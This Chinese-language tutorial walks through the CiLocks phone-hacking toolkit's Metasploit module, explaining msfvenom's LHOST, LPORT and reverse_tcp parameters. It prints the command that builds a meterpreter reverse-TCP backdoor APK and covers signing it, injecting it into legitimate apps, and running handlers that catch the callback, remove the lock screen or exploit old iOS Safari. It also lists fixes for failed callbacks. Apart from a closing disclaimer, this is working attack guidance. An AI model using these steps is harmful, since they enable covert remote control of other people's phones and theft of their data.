CiLocks msfvenom参数完全解析:LHOST、LPORT与reverse_tcp一次看懂
【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks
CiLocks 是一款开源的 Android/iOS 锁屏破解工具箱,其中内置了基于msfvenom的后门载荷生成功能。本文以 CiLocks 为例,把新手最常问的三个 msfvenom 参数——LHOST、LPORT与reverse_tcp——一次讲透:它们各代表什么、怎么填、有哪些坑,帮助你 10 分钟看懂 CiLocks 的 Metasploit 模块。
上图是 CiLocks 的主菜单,选项 10 "Jump To Metasploit" 就是进入 msfvenom 后门生成模块的入口。
CiLocks Metasploit 后门生成器菜单速览
选择 10 后会进入Metasploit Backdoor Generator子菜单,共 4 个选项:
| 选项 | 功能 | 底层机制 |
|---|---|---|
| 1. Install Application | 通过 adb 安装并启动指定 APK | adb install + am start |
| 2. Create Payload Backdoor {Msfvenom} Signed | 用 msfvenom 生成已签名的后门 APK | msfvenom + keytool + jarsigner + zipalign |
| 3. Run Metasploit | 自动开启监听等待载荷回连 | exploit/multi/handler 等模块 |
| 4. Inject Payload In Original Application | 向原始 APK 中注入 msfvenom 载荷 | msfvenom -x 注入 |
对应实现逻辑集中在主脚本的选项 10 分支中:cilocks。
LHOST 参数解析:载荷回连的"大本营"IP
- LHOST = Local Host(本地主机),填你本机的 IP 地址
- 目标设备安装 APK 后,会主动向 LHOST 发起连接(而不是你连它)
- 如何获取:终端执行
ip addr | grep 'state UP';CiLocks 启动时也会自动检测并打印 "Your IP Address"(cilocks) - ⚠️ 必须填目标能访问到的局域网 IP,填 127.0.0.1 对目标没有意义
LPORT 参数解析:本机监听的端口号
- LPORT = Local Port(本地端口),即你等待载荷回连的端口
- 生成 APK 时填的 LPORT,与后面运行 Metasploit 监听器时必须完全一致
- Metasploit 默认常用 4444,只要端口未被其他程序占用即可
- 换了 LPORT 就必须重新生成APK,否则永远等不到回连
reverse_tcp 解析:为什么用"反向连接"
- reverse_tcp(反向 TCP):由被控端(手机)主动拨号到攻击机,而非攻击机主动外联
- 适合目标位于 NAT、路由器之后的场景,无需端口映射,这也是移动端渗透的首选
- CiLocks 中 Android 使用
android/meterpreter/reverse_tcp,iOS 使用osx/armle/execute/reverse_tcp(cilocks)
CiLocks 选项 2 的核心生成命令(主脚本第 377 行):
msfvenom -p android/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> R> loli.apk-p指定 payload(载荷)类型lhost= / lport=即上文解析的两个关键 msfvenom 参数R>将编码后的载荷重定向输出为 APK 文件
生成后 CiLocks 还会自动完成签名与对齐:keytool 生成 keystore → jarsigner 签名 → zipalign 对齐,最终产出可正常安装的签名 APK(cilocks)。
运行 Metasploit 监听:LHOST 与 LPORT 的二次确认
选择选项 3 "Run Metasploit" 时,会再次询问 LHOST 和 LPORT,并根据监听器选择在新终端窗口自动组装 msfconsole 命令:
| 监听器 | msfconsole 模块 | 用途 |
|---|---|---|
| 1. Multi Handler {Default} | exploit/multi/handler | 通用载荷回连处理 |
| 2. Remove Lock | post/android/manage/remove_lock | 载荷上线后移除锁屏 |
| 3. Remove Lock {Root} | post/android/manage/remove_lock_root | 已 Root 设备移除锁屏 |
| 4. Safari Jit {iOS < 7.1.2} | exploit/apple_ios/browser/safari_jit | 旧版 iOS Safari JIT 利用 |
组装逻辑位于 cilocks,会自动set PAYLOAD、set lhost、set lport后执行exploit;。
新手常见 4 个坑,一次避完
- LHOST / LPORT 两端不一致:生成 APK 与监听器的参数必须一一对应,这是"收不到回连"的首要原因
- LHOST 填错地址:填目标所在网络的局域网 IP,不要填公网 IP 或 127.0.0.1
- 端口被占用:监听器报 Address already in use 时,换一个 LPORT 并重新生成载荷
- 防火墙拦截:确认本机防火墙已放行 LPORT,且两端网络互通
环境准备与相关目录
- 安装 Metasploit:
sudo apt install msfconsole -y;CiLocks 启动时由 data/config 自动检测是否已安装并提示 - 生成的后门 APK 统一保存在 backdoor/ 目录
- 完整安装步骤与依赖清单见 README.md
- 其他模块:PIN 暴力破解字典 4digit.txt、6digit.txt,AntiGuard 锁屏绕过应用源码 unlock.java
⚠️注意:CiLocks 仅供安全学习与授权测试使用,请勿用于任何非法活动(README 明确声明 "Please Don't Use for illegal Activity")。
【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考